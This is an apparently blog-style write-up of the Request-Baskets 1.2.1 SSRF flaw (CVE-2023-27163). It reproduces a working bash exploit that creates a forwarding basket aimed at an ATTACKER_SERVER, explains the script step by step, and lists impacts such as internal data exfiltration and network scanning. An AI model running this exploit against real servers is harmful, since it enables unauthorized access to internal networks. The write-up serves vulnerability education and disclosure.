Request-Baskets 1.2.1 Server-Side Request Forgery (CVE-2023–27163)

5 min readSep 5, 2023

1- What is Request-Baskets

Request Baskets is a web service designed to capture arbitrary HTTP requests and facilitate their inspection through either a RESTful API or a straightforward web user interface.

This service draws inspiration from the concepts and application design principles of the RequestHub project and recreates the functionality previously provided by the RequestBin service.

2-SSRF on Request-Baskets (CVE-2023–27163)

CVE-2023–27163 represents a critical Server-Side Request Forgery (SSRF) vulnerability that was identified in Request-Baskets, affecting all versions up to and including 1.2.1. This particular vulnerability grants malicious actors the ability to gain unauthorized access to network resources and sensitive information by exploiting the /api/baskets/{name} component through carefully crafted API requests.

3- How Does It Work

As previously mentioned, Request-Baskets operates as a web application designed to collect and log incoming HTTP requests directed to specific endpoints known as “baskets.” During the creation of these baskets, users have the flexibility to specify alternative servers to which these requests should be forwarded. The critical issue here lies in the fact that users can inadvertently specify services they shouldn’t have access to, including those typically restricted within a network environment.

For example, consider a scenario where the server hosts Request-Baskets on port 55555 and simultaneously runs a Flask web server on port 8000. The Flask server, however, is configured to exclusively interact with the localhost. In this context, an attacker can exploit the SSRF vulnerability by creating a basket that forwards requests to http://localhost:8000, effectively bypassing the previous network restrictions and gaining access to the Flask web server, which should have been restricted to local access only.

4- Exploit script

The script has been from vulners website

# Exploit Title: Request-Baskets v1.2.1 - Server-side request forgery (SSRF)  
# Exploit Author: Iyaad Luqman K (init_6)  
# Application: Request-Baskets v1.2.1  
# Tested on: Ubuntu 22.04  
# CVE: CVE-2023-27163  
  
  
# PoC  
#!/bin/bash  
  
  
if [ "$#" -lt 2 ] || [ "$1" = "-h" ] || [ "$1" = "--help" ]; then  
help="Usage: exploit.sh <URL> <TARGET>\n\n";  
help+="Arguments:\n" \  
help+=" URL main path (/) of the server (eg. http://127.0.0.1:5000/)\n";  
help+=" TARGET";  
  
echo -e "$help";  
exit 1;  
fi  
  
URL=$1  
ATTACKER_SERVER=$2  
  
if [ "${URL: -1}" != "/" ]; then  
URL="$URL/";  
fi;  
  
BASKET_NAME=$(LC_ALL=C tr -dc 'a-z' </dev/urandom | head -c "6");  
  
API_URL="$URL""api/baskets/$BASKET_NAME";  
  
PAYLOAD="{\"forward_url\": \"$ATTACKER_SERVER\",\"proxy_response\": true,\"insecure_tls\": false,\"expand_path\": true,\"capacity\": 250}";  
  
echo "> Creating the \"$BASKET_NAME\" proxy basket...";  
  
if ! response=$(curl -s -X POST -H 'Content-Type: application/json' -d "$PAYLOAD" "$API_URL"); then  
echo "> FATAL: Could not properly request $API_URL. Is the server online?";  
exit 1;  
fi;  
  
BASKET_URL="$URL$BASKET_NAME";  
  
echo "> Basket created!";  
echo "> Accessing $BASKET_URL now makes the server request to $ATTACKER_SERVER.";  
  
if ! jq --help 1>/dev/null; then  
echo "> Response body (Authorization): $response";  
else  
echo "> Authorization: $(echo "$response" | jq -r ".token")";  
fi;  
  
exit 0;

Explanation

Here’s a breakdown of what the code does:

Argument Validation: The script checks the number of command-line arguments passed to it. If the number of arguments is less than 2, or if the first argument is “-h” or “ — help,” it displays usage information and exits.
Parsing Command-Line Arguments: It assigns the first argument ($1) to the URL variable and the second argument ($2) to the ATTACKER_SERVER variable. It also ensures that the URL ends with a slash ("/") to construct valid URLs.
Generating a Random BASKET_NAME: It generates a random string of lowercase letters and assigns it to the BASKET_NAME variable.
Constructing API_URL and PAYLOAD: It constructs the API_URL by appending the BASKET_NAME to the URL. Then, it constructs the JSON payload (PAYLOAD) with various parameters, including the ATTACKER_SERVER as the forward_url.
Creating a Proxy Basket: The script sends an HTTP POST request to the API_URL with the JSON payload as data using curl. This creates a "proxy basket" on the target server, forwarding requests to the ATTACKER_SERVER.
Handling the Response: It checks if the curl command was successful. If it wasn't, it outputs an error message and exits. Otherwise, it displays a success message and information about the created proxy basket.
Using jq for JSON Parsing: If the jq tool is available, it attempts to parse the response JSON to extract the "Authorization" token. If jq is not available, it displays the entire response body.
Exit: The script exits with a status of 0, indicating success.

This script essentially creates a proxy basket on the target server, which forwards requests to an attacker-controlled server specified as ATTACKER_SERVER. The attacker can use this to make the target server send requests to arbitrary destinations, potentially exposing sensitive internal resources or performing unauthorized actions.

5- Influence：

a- Information Disclosure and Exfiltration:

The SSRF vulnerability in Request-Baskets presents a significant risk of information disclosure and exfiltration. While an initial concern was the unauthorized retrieval of unauthenticated images, it extends beyond images. Any resource accessible through an HTTP request within the local network of the web server can be remotely retrieved using this exploit.

b- Unauthenticated Access to Internal Network HTTP Servers:

Exploiting the SSRF attack allows for unauthenticated access to any HTTP server connected to the same network as the Request-Baskets server. This includes internal-only exposed servers like Nginx instances, internal RESTful APIs, such as NoSQL and GraphQL databases. Importantly, this access isn’t limited to services hosted on the local machine; it encompasses all machines connected within the local network.

c- Port and IP Scanning and Enumeration:

The SSRF vulnerability provides a pathway for conducting port scans on-demand for both internal and external HTTP servers. Furthermore, it enables the enumeration of all machines within the local network that have open HTTP ports. This capability empowers malicious actors with reconnaissance capabilities, potentially revealing the entire network architecture and its exposed vulnerabilities.

6- Conclusion

This vulnerability underscores the importance of proper security controls and validation mechanisms to prevent unauthorized access and ensure the safe operation of web services. Understanding the nuances of SSRF vulnerabilities, like the one discovered in Request-Baskets, is critical for both developers and security professionals, as it helps in identifying and mitigating such risks effectively.